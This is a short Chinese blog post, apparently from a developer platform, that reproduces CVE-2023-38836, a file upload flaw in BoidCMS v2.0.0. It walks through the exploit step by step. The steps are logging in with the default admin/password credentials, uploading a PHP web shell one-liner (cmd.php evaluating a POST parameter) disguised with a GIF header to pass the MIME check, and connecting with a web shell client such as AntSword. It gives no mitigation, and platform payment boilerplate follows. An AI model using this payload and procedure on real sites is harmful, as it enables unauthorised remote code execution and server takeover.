BoidCMS文件上传漏洞(CVE-2023-38836)

一、漏洞概述

BoidCMS v.2.0.0 存在文件上传漏洞,远程攻击者可通过添加 GIF 头部绕过 MIME 类型检查,执行任意代码。

二、影响范围

BoidCMS v.2.0.0

三、访问页面

四、漏洞复现

1、后台地址/admin

2、使用账号密码admin/password登录后台

3、找到文件上传点media

4、制作cmd.php文件

<?php @eval($_POST['cmd']);?>

5、上传cmd.php文件,抓包添加GIF头部绕过 MIME 类型检查。

6、访问cmd.php上传地址/media/cmd.php成功。

7、使用蚁剑等工具连接

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值